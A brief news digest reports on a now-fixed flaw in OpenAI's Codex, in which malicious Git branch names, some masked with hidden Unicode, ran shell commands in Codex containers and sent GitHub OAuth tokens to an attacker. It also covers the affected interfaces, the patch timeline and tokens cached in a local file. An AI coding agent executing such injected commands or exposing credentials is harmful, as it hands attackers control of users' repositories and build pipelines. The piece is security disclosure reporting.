Particle.news

OpenAI Fixes Codex Flaw That Let Malicious Git Branches Steal GitHub Tokens

The case shows AI coding tools run commands with access to tokens, turning developer environments into targets.

Overview

  • BeyondTrust Phantom Labs detailed how malicious Git branch names, including ones masked by hidden Unicode, executed shell commands in Codex containers and sent GitHub OAuth tokens to an attacker.
  • The weakness touched the ChatGPT site, the SDK, the CLI, and IDE integrations, so one tainted repository could expose every Codex user who opened it.
  • In many enterprises those short‑lived tokens carry broad repository and workflow rights, which could give attackers control over code and build pipelines.
  • OpenAI rolled out a hotfix in December 2025 and then hardened command handling and limited token scope by January 2026, and the company confirms the issue is fixed.
  • Researchers also flagged tokens cached in a local auth.json file and, along with a recent LiteLLM package compromise and Claude’s new computer control, warned that AI coding tools now form a growing attack surface.